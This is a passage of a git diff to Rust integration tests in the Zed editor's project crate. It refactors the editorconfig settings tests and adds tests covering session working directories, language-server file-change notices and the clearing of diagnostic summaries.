); ensure_uniform_list_compatible_label(&mut label); assert_eq!( @@ -51,7 +51,7 @@ fn test_multi_len_chars_normalization() { CodeLabel::new( "myElˇ (parameter) myElˇ: { foo: string; }".to_string(), 0..6, - vec![(0..6, HighlightId(1))], + vec![(0..6, HighlightId::new(1))], ) ); } diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index 9bd0be45ae3fa1e66e8af2c43657ba039045ecef..d6c2ce37c9e60e17bd43c3f6c3ad10cde52b4bec 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -26,17 +26,17 @@ use buffer_diff::{ }; use collections::{BTreeSet, HashMap, HashSet}; use encoding_rs; -use fs::FakeFs; +use fs::{FakeFs, PathEventKind}; use futures::{StreamExt, future}; use git::{ GitHostingProviderRegistry, repository::{RepoPath, repo_path}, - status::{FileStatus, StatusCode, TrackedStatus}, + status::{DiffStat, FileStatus, StatusCode, TrackedStatus}, }; use git2::RepositoryInitOptions; use gpui::{ App, AppContext, BackgroundExecutor, BorrowAppContext, Entity, FutureExt, SharedString, Task, - UpdateGlobal, + TestAppContext, UpdateGlobal, }; use itertools::Itertools; use language::{ @@ -44,7 +44,7 @@ use language::{ DiagnosticSourceKind, DiskState, FakeLspAdapter, Language, LanguageConfig, LanguageMatcher, LanguageName, LineEnding, ManifestName, ManifestProvider, ManifestQuery, OffsetRangeExt, Point, ToPoint, Toolchain, ToolchainList, ToolchainLister, ToolchainMetadata, - language_settings::{LanguageSettingsContent, language_settings}, + language_settings::{LanguageSettings, LanguageSettingsContent}, markdown_lang, rust_lang, tree_sitter_typescript, }; use lsp::{ @@ -76,7 +76,7 @@ use std::{ path::{Path, PathBuf}, rc::Rc, str::FromStr, - sync::{Arc, OnceLock}, + sync::{Arc, OnceLock, atomic}, task::Poll, time::Duration, }; @@ -126,6 +126,63 @@ async fn test_block_via_smol(cx: &mut gpui::TestAppContext) { task.await; } +#[gpui::test] +async fn 
test_default_session_work_dirs_prefers_directory_worktrees_over_single_file_parents( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/root"), + json!({ + "dir-project": { + "src": { + "main.rs": "fn main() {}" + } + }, + "single-file.rs": "fn helper() {}" + }), + ) + .await; + + let project = Project::test( + fs, + [ + Path::new(path!("/root/single-file.rs")), + Path::new(path!("/root/dir-project")), + ], + cx, + ) + .await; + + let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx)); + let ordered_paths = work_dirs.ordered_paths().cloned().collect::>(); + + assert_eq!( + ordered_paths, + vec![ + PathBuf::from(path!("/root/dir-project")), + PathBuf::from(path!("/root")), + ] + ); +} + +#[gpui::test] +async fn test_default_session_work_dirs_falls_back_to_home_for_empty_project( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + + let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx)); + let ordered_paths = work_dirs.ordered_paths().cloned().collect::>(); + + assert_eq!(ordered_paths, vec![paths::home_dir().to_path_buf()]); +} + // NOTE: // While POSIX symbolic links are somewhat supported on Windows, they are an opt in by the user, and thus // we assume that they are not supported out of the box. 
@@ -239,50 +296,43 @@ async fn test_editorconfig_support(cx: &mut gpui::TestAppContext) { cx.executor().run_until_parked(); - cx.update(|cx| { - let tree = worktree.read(cx); - let settings_for = |path: &str| { - let file_entry = tree.entry_for_path(rel_path(path)).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - language_settings(Some(file_language.name()), Some(&file), cx).into_owned() - }; + let settings_for = async |path: &str, cx: &mut TestAppContext| -> LanguageSettings { + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path(path)), cx) + }) + .await + .unwrap(); + cx.update(|cx| LanguageSettings::for_buffer(&buffer.read(cx), cx).into_owned()) + }; - let settings_a = settings_for("a.rs"); - let settings_b = settings_for("b/b.rs"); - let settings_c = settings_for("c.js"); - let settings_d = settings_for("d/d.rs"); - let settings_readme = settings_for("README.json"); + let settings_a = settings_for("a.rs", cx).await; + let settings_b = settings_for("b/b.rs", cx).await; + let settings_c = settings_for("c.js", cx).await; + let settings_d = settings_for("d/d.rs", cx).await; + let settings_readme = settings_for("README.json", cx).await; + // .editorconfig overrides .zed/settings + assert_eq!(Some(settings_a.tab_size), NonZeroU32::new(3)); + assert_eq!(settings_a.hard_tabs, true); + assert_eq!(settings_a.ensure_final_newline_on_save, true); + assert_eq!(settings_a.remove_trailing_whitespace_on_save, true); + assert_eq!(settings_a.preferred_line_length, 120); - // .editorconfig overrides .zed/settings - assert_eq!(Some(settings_a.tab_size), NonZeroU32::new(3)); - assert_eq!(settings_a.hard_tabs, true); - 
assert_eq!(settings_a.ensure_final_newline_on_save, true); - assert_eq!(settings_a.remove_trailing_whitespace_on_save, true); - assert_eq!(settings_a.preferred_line_length, 120); + // .editorconfig in b/ overrides .editorconfig in root + assert_eq!(Some(settings_b.tab_size), NonZeroU32::new(2)); - // .editorconfig in subdirectory overrides .editorconfig in root - assert_eq!(Some(settings_b.tab_size), NonZeroU32::new(2)); - assert_eq!(Some(settings_d.tab_size), NonZeroU32::new(1)); + // .editorconfig in subdirectory overrides .editorconfig in root + assert_eq!(Some(settings_d.tab_size), NonZeroU32::new(1)); - // "indent_size" is not set, so "tab_width" is used - assert_eq!(Some(settings_c.tab_size), NonZeroU32::new(10)); + // "indent_size" is not set, so "tab_width" is used + assert_eq!(Some(settings_c.tab_size), NonZeroU32::new(10)); - // When max_line_length is "off", default to .zed/settings.json - assert_eq!(settings_b.preferred_line_length, 64); - assert_eq!(settings_c.preferred_line_length, 64); + // When max_line_length is "off", default to .zed/settings.json + assert_eq!(settings_b.preferred_line_length, 64); + assert_eq!(settings_c.preferred_line_length, 64); - // README.md should not be affected by .editorconfig's globe "*.rs" - assert_eq!(Some(settings_readme.tab_size), NonZeroU32::new(8)); - }); + // README.md should not be affected by .editorconfig's globe "*.rs" + assert_eq!(Some(settings_readme.tab_size), NonZeroU32::new(8)); } #[gpui::test] @@ -316,37 +366,28 @@ async fn test_external_editorconfig_support(cx: &mut gpui::TestAppContext) { let worktree = project.update(cx, |project, cx| project.worktrees(cx).next().unwrap()); cx.executor().run_until_parked(); + let settings_for = async |path: &str, cx: &mut TestAppContext| -> LanguageSettings { + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path(path)), cx) + }) + .await + .unwrap(); + cx.update(|cx| LanguageSettings::for_buffer(&buffer.read(cx), 
cx).into_owned()) + }; - cx.update(|cx| { - let tree = worktree.read(cx); - let settings_for = |path: &str| { - let file_entry = tree.entry_for_path(rel_path(path)).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - language_settings(Some(file_language.name()), Some(&file), cx).into_owned() - }; - - let settings_rs = settings_for("main.rs"); - let settings_md = settings_for("README.md"); - let settings_txt = settings_for("other.txt"); + let settings_rs = settings_for("main.rs", cx).await; + let settings_md = settings_for("README.md", cx).await; + let settings_txt = settings_for("other.txt", cx).await; - // main.rs gets indent_size = 2 from parent's external .editorconfig - assert_eq!(Some(settings_rs.tab_size), NonZeroU32::new(2)); + // main.rs gets indent_size = 2 from parent's external .editorconfig + assert_eq!(Some(settings_rs.tab_size), NonZeroU32::new(2)); - // README.md gets indent_size = 3 from internal worktree .editorconfig - assert_eq!(Some(settings_md.tab_size), NonZeroU32::new(3)); + // README.md gets indent_size = 3 from internal worktree .editorconfig + assert_eq!(Some(settings_md.tab_size), NonZeroU32::new(3)); - // other.txt gets indent_size = 4 from grandparent's external .editorconfig - assert_eq!(Some(settings_txt.tab_size), NonZeroU32::new(4)); - }); + // other.txt gets indent_size = 4 from grandparent's external .editorconfig + assert_eq!(Some(settings_txt.tab_size), NonZeroU32::new(4)); } #[gpui::test] @@ -375,24 +416,14 @@ async fn test_internal_editorconfig_root_stops_traversal(cx: &mut gpui::TestAppC cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("src/file.rs")), 
cx) + }) + .await + .unwrap(); cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree - .entry_for_path(rel_path("src/file.rs")) - .unwrap() - .clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); - + let settings = LanguageSettings::for_buffer(buffer.read(cx), cx).into_owned(); assert_eq!(Some(settings.tab_size), NonZeroU32::new(2)); }); } @@ -423,20 +454,15 @@ async fn test_external_editorconfig_root_stops_traversal(cx: &mut gpui::TestAppC cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // file.rs gets indent_size = 2 from worktree's root config, NOT 99 from parent assert_eq!(Some(settings.tab_size), NonZeroU32::new(2)); @@ -471,20 +497,15 @@ async fn test_external_editorconfig_root_in_parent_stops_traversal(cx: &mut gpui cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + 
project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // file.rs gets indent_size = 4 from parent's root config, NOT 99 from grandparent assert_eq!(Some(settings.tab_size), NonZeroU32::new(4)); @@ -527,30 +548,24 @@ async fn test_external_editorconfig_shared_across_worktrees(cx: &mut gpui::TestA cx.executor().run_until_parked(); - cx.update(|cx| { - let worktrees: Vec<_> = project.read(cx).worktrees(cx).collect(); - assert_eq!(worktrees.len(), 2); + let worktrees: Vec<_> = cx.update(|cx| project.read(cx).worktrees(cx).collect()); + assert_eq!(worktrees.len(), 2); - for worktree in worktrees { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = - language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + for worktree in worktrees { + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + + cx.update(|cx| { + let settings = 
LanguageSettings::for_buffer(&buffer.read(cx), cx); // Both worktrees should get indent_size = 5 from shared parent .editorconfig assert_eq!(Some(settings.tab_size), NonZeroU32::new(5)); - } - }); + }); + } } #[gpui::test] @@ -580,20 +595,15 @@ async fn test_external_editorconfig_not_loaded_without_internal_config( cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // file.rs should have default tab_size = 4, NOT 99 from parent's external .editorconfig // because without an internal .editorconfig, external configs are not loaded @@ -627,20 +637,15 @@ async fn test_external_editorconfig_modification_triggers_refresh(cx: &mut gpui: cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let 
file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Test initial settings: tab_size = 4 from parent's external .editorconfig assert_eq!(Some(settings.tab_size), NonZeroU32::new(4)); @@ -655,20 +660,15 @@ async fn test_external_editorconfig_modification_triggers_refresh(cx: &mut gpui: cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Test settings updated: tab_size = 8 assert_eq!(Some(settings.tab_size), NonZeroU32::new(8)); @@ -703,21 +703,16 @@ async fn test_adding_worktree_discovers_external_editorconfigs(cx: &mut gpui::Te cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + let id = project.worktrees(cx).next().unwrap().read(cx).id(); + project.open_buffer((id, rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let worktree = project.read(cx).worktrees(cx).next().unwrap(); - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - 
.load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx).into_owned(); // Test existing worktree has tab_size = 7 assert_eq!(Some(settings.tab_size), NonZeroU32::new(7)); @@ -732,20 +727,15 @@ async fn test_adding_worktree_discovers_external_editorconfigs(cx: &mut gpui::Te cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((new_worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = new_worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, new_worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Verify new worktree also has tab_size = 7 from shared parent editorconfig assert_eq!(Some(settings.tab_size), NonZeroU32::new(7)); @@ -886,20 +876,15 @@ async fn test_shared_external_editorconfig_cleanup_with_multiple_worktrees( assert_eq!(watcher_paths.len(), 1); }); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree_b.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree_b.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, 
worktree_b.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Test worktree_b still has correct settings assert_eq!(Some(settings.tab_size), NonZeroU32::new(5)); @@ -1026,26 +1011,28 @@ async fn test_managing_project_specific_settings(cx: &mut gpui::TestAppContext) id_base: "local worktree tasks from directory \".zed\"".into(), }; - let all_tasks = cx - .update(|cx| { - let tree = worktree.read(cx); - - let file_a = File::for_entry( - tree.entry_for_path(rel_path("a/a.rs")).unwrap().clone(), - worktree.clone(), - ) as _; - let settings_a = language_settings(None, Some(&file_a), cx); - let file_b = File::for_entry( - tree.entry_for_path(rel_path("b/b.rs")).unwrap().clone(), - worktree.clone(), - ) as _; - let settings_b = language_settings(None, Some(&file_b), cx); + let buffer_a = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("a/a.rs")), cx) + }) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("b/b.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { + let settings_a = LanguageSettings::for_buffer(&buffer_a.read(cx), cx); + let settings_b = LanguageSettings::for_buffer(&buffer_b.read(cx), cx); - assert_eq!(settings_a.tab_size.get(), 8); - assert_eq!(settings_b.tab_size.get(), 2); + assert_eq!(settings_a.tab_size.get(), 8); + assert_eq!(settings_b.tab_size.get(), 2); + }); - get_all_tasks(&project, task_contexts.clone(), cx) - }) + let all_tasks = cx + .update(|cx| get_all_tasks(&project, task_contexts.clone(), cx)) .await .into_iter() .map(|(source_kind, 
task)| { @@ -1784,7 +1771,7 @@ async fn test_managing_language_servers(cx: &mut gpui::TestAppContext) { DiagnosticSet::from_sorted_entries( vec![DiagnosticEntry { diagnostic: Default::default(), - range: Anchor::MIN..Anchor::MAX, + range: Anchor::min_max_range_for_buffer(buffer.remote_id()), }], &buffer.snapshot(), ), @@ -2072,6 +2059,97 @@ async fn test_language_server_tilde_path(cx: &mut gpui::TestAppContext) { ); } +#[gpui::test] +async fn test_rescan_fs_change_is_reported_to_language_servers_as_changed( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/the-root"), + json!({ + "Cargo.lock": "", + "src": { + "a.rs": "", + } + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/the-root").as_ref()], cx).await; + let (language_registry, _lsp_store) = project.read_with(cx, |project, _| { + (project.languages().clone(), project.lsp_store()) + }); + language_registry.add(rust_lang()); + let mut fake_servers = language_registry.register_fake_lsp( + "Rust", + FakeLspAdapter { + name: "the-language-server", + ..Default::default() + }, + ); + + cx.executor().run_until_parked(); + + project + .update(cx, |project, cx| { + project.open_local_buffer_with_lsp(path!("/the-root/src/a.rs"), cx) + }) + .await + .unwrap(); + + let fake_server = fake_servers.next().await.unwrap(); + cx.executor().run_until_parked(); + + let file_changes = Arc::new(Mutex::new(Vec::new())); + fake_server + .request::( + lsp::RegistrationParams { + registrations: vec![lsp::Registration { + id: Default::default(), + method: "workspace/didChangeWatchedFiles".to_string(), + register_options: serde_json::to_value( + lsp::DidChangeWatchedFilesRegistrationOptions { + watchers: vec![lsp::FileSystemWatcher { + glob_pattern: lsp::GlobPattern::String( + path!("/the-root/Cargo.lock").to_string(), + ), + kind: None, + }], + }, + ) + .ok(), + }], + }, + DEFAULT_LSP_REQUEST_TIMEOUT, + ) + .await + .into_response() + 
.unwrap(); + fake_server.handle_notification::({ + let file_changes = file_changes.clone(); + move |params, _| { + let mut file_changes = file_changes.lock(); + file_changes.extend(params.changes); + } + }); + + cx.executor().run_until_parked(); + assert_eq!(mem::take(&mut *file_changes.lock()), &[]); + + fs.emit_fs_event(path!("/the-root/Cargo.lock"), Some(PathEventKind::Rescan)); + cx.executor().run_until_parked(); + + assert_eq!( + &*file_changes.lock(), + &[lsp::FileEvent { + uri: lsp::Uri::from_file_path(path!("/the-root/Cargo.lock")).unwrap(), + typ: lsp::FileChangeType::CHANGED, + }] + ); +} + #[gpui::test] async fn test_reporting_fs_changes_to_language_servers(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -3601,13 +3679,273 @@ async fn test_diagnostics_from_multiple_language_servers(cx: &mut gpui::TestAppC .unwrap(); assert_eq!( - lsp_store.diagnostic_summary(false, cx), + lsp_store.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 2, + warning_count: 0, + } + ); + }); +} + +#[gpui::test] +async fn test_diagnostic_summaries_cleared_on_worktree_entry_removal( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": "one", "b.rs": "two" })) + .await; + + let project = Project::test(fs.clone(), [Path::new(path!("/dir"))], cx).await; + let lsp_store = project.read_with(cx, |project, _| project.lsp_store()); + + lsp_store.update(cx, |lsp_store, cx| { + lsp_store + .update_diagnostic_entries( + LanguageServerId(0), + Path::new(path!("/dir/a.rs")).to_owned(), + None, + None, + vec![DiagnosticEntry { + range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)), + diagnostic: Diagnostic { + severity: DiagnosticSeverity::ERROR, + is_primary: true, + message: "error in a".to_string(), + source_kind: DiagnosticSourceKind::Pushed, + ..Diagnostic::default() + }, + }], + cx, + ) + .unwrap(); + lsp_store + .update_diagnostic_entries( + 
LanguageServerId(0), + Path::new(path!("/dir/b.rs")).to_owned(), + None, + None, + vec![DiagnosticEntry { + range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)), + diagnostic: Diagnostic { + severity: DiagnosticSeverity::WARNING, + is_primary: true, + message: "warning in b".to_string(), + source_kind: DiagnosticSourceKind::Pushed, + ..Diagnostic::default() + }, + }], + cx, + ) + .unwrap(); + + assert_eq!( + lsp_store.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 1, + warning_count: 1, + } + ); + }); + + fs.remove_file(path!("/dir/a.rs").as_ref(), Default::default()) + .await + .unwrap(); + cx.executor().run_until_parked(); + + lsp_store.update(cx, |lsp_store, cx| { + assert_eq!( + lsp_store.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 0, + warning_count: 1, + }, + ); + }); +} + +#[gpui::test] +async fn test_diagnostic_summaries_cleared_on_server_restart(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": "x" })).await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(rust_lang()); + let mut fake_servers = language_registry.register_fake_lsp("Rust", FakeLspAdapter::default()); + + let (buffer, _handle) = project + .update(cx, |project, cx| { + project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + + let fake_server = fake_servers.next().await.unwrap(); + fake_server.notify::(lsp::PublishDiagnosticsParams { + uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(), + version: None, + diagnostics: vec![lsp::Diagnostic { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 1)), + severity: Some(lsp::DiagnosticSeverity::ERROR), + message: "error before restart".to_string(), + ..Default::default() + }], + }); + 
cx.executor().run_until_parked(); + + project.update(cx, |project, cx| { + assert_eq!( + project.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 1, + warning_count: 0, + } + ); + }); + + let mut events = cx.events(&project); + + project.update(cx, |project, cx| { + project.restart_language_servers_for_buffers(vec![buffer.clone()], HashSet::default(), cx); + }); + cx.executor().run_until_parked(); + + let mut received_diagnostics_updated = false; + while let Some(Some(event)) = + futures::FutureExt::now_or_never(futures::StreamExt::next(&mut events)) + { + if matches!(event, Event::DiagnosticsUpdated { .. }) { + received_diagnostics_updated = true; + } + } + assert!( + received_diagnostics_updated, + "DiagnosticsUpdated event should be emitted when a language server is stopped" + ); + + project.update(cx, |project, cx| { + assert_eq!( + project.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 0, + warning_count: 0, + } + ); + }); +} + +#[gpui::test] +async fn test_diagnostic_summaries_cleared_on_buffer_reload(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": "one two three" })) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(rust_lang()); + let pull_count = Arc::new(atomic::AtomicUsize::new(0)); + let closure_pull_count = pull_count.clone(); + let mut fake_servers = language_registry.register_fake_lsp( + "Rust", + FakeLspAdapter { + capabilities: lsp::ServerCapabilities { + diagnostic_provider: Some(lsp::DiagnosticServerCapabilities::Options( + lsp::DiagnosticOptions { + identifier: Some("test-reload".to_string()), + inter_file_dependencies: true, + workspace_diagnostics: false, + work_done_progress_options: Default::default(), + }, + )), + ..lsp::ServerCapabilities::default() + }, + 
initializer: Some(Box::new(move |fake_server| { + let pull_count = closure_pull_count.clone(); + fake_server.set_request_handler::( + move |_, _| { + let pull_count = pull_count.clone(); + async move { + pull_count.fetch_add(1, atomic::Ordering::SeqCst); + Ok(lsp::DocumentDiagnosticReportResult::Report( + lsp::DocumentDiagnosticReport::Full( + lsp::RelatedFullDocumentDiagnosticReport { + related_documents: None, + full_document_diagnostic_report: + lsp::FullDocumentDiagnosticReport { + result_id: None, + items: Vec::new(), + }, + }, + ), + )) + } + }, + ); + })), + ..FakeLspAdapter::default() + }, + ); + + let (_buffer, _handle) = project + .update(cx, |project, cx| { + project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + + let fake_server = fake_servers.next().await.unwrap(); + cx.executor().run_until_parked(); + + // Publish initial diagnostics via the fake server. + fake_server.notify::(lsp::PublishDiagnosticsParams { + uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(), + version: None, + diagnostics: vec![lsp::Diagnostic { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 3)), + severity: Some(lsp::DiagnosticSeverity::ERROR), + message: "error in a".to_string(), + ..Default::default() + }], + }); + cx.executor().run_until_parked(); + + project.update(cx, |project, cx| { + assert_eq!( + project.diagnostic_summary(false, cx), DiagnosticSummary { - error_count: 2, + error_count: 1, warning_count: 0, } ); }); + + let pulls_before = pull_count.load(atomic::Ordering::SeqCst); + + // Change the file on disk. The FS event triggers buffer reload, + // which in turn triggers pull_diagnostics_for_buffer. 
+ fs.save( + path!("/dir/a.rs").as_ref(), + &"fixed content".into(), + LineEnding::Unix, + ) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let pulls_after = pull_count.load(atomic::Ordering::SeqCst); + assert!( + pulls_after > pulls_before, + "Expected document diagnostic pull after buffer reload (before={pulls_before}, after={pulls_after})" + ); } #[gpui::test] @@ -4110,7 +4448,7 @@ async fn test_definition(cx: &mut gpui::TestAppContext) { // Assert no new language server started cx.executor().run_until_parked(); - assert!(fake_servers.try_next().is_err()); + assert!(fake_servers.try_recv().is_err()); assert_eq!(definitions.len(), 1); let definition = definitions.pop().unwrap(); @@ -5359,6 +5697,52 @@ async fn test_rescan_and_remote_updates(cx: &mut gpui::TestAppContext) { }); } +#[cfg(target_os = "linux")] +#[gpui::test(retries = 5)] +async fn test_recreated_directory_receives_child_events(cx: &mut gpui::TestAppContext) { + init_test(cx); + cx.executor().allow_parking(); + + let dir = TempTree::new(json!({})); + let project = Project::test(Arc::new(RealFs::new(None, cx.executor())), [dir.path()], cx).await; + let tree = project.update(cx, |project, cx| project.worktrees(cx).next().unwrap()); + + tree.flush_fs_events(cx).await; + + let repro_dir = dir.path().join("repro"); + std::fs::create_dir(&repro_dir).unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!(tree.read(cx).entry_for_path(rel_path("repro")).is_some()); + }); + + std::fs::remove_dir_all(&repro_dir).unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!(tree.read(cx).entry_for_path(rel_path("repro")).is_none()); + }); + + std::fs::create_dir(&repro_dir).unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!(tree.read(cx).entry_for_path(rel_path("repro")).is_some()); + }); + + std::fs::write(repro_dir.join("repro-marker"), "").unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!( + tree.read(cx) + 
